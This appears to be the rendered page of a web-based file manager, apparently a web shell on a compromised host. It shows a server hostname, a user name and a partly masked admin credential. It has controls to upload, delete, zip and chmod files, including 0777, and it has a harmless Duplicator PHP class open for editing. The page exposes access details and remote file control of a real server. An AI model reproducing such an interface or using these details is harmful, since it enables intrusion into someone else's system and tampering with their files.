🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_937f8c22 / 2de9****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: MessageCustomizerItem.php
<?php namespace Duplicator\Installer\Utils\Tests; class MessageCustomizerItem { private $checkCallback; private $applyCallback; /** * @param callable|bool $checkCallback callback or bool whether to apply customization * @param callable $applyCallback the customizations to be applied */ public function __construct($checkCallback, $applyCallback) { if (!is_bool($checkCallback) && !is_callable($checkCallback)) { throw new \Exception("check callback must be either bool or callable"); } $this->checkCallback = $checkCallback; if (!is_callable($applyCallback)) { throw new \Exception("customization callback must be callable"); } $this->applyCallback = $applyCallback; } /** * @param mixed $input necessary input to check condition * * @return bool */ public function conditionSatisfied($input) { return (is_bool($this->checkCallback) && $this->checkCallback) || call_user_func($this->checkCallback, $input); } /** * @param string $string string to be customized * @param mixed $context context about what to apply * * @return false|mixed */ public function apply($string, $context) { return call_user_func($this->applyCallback, $string, $context); } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar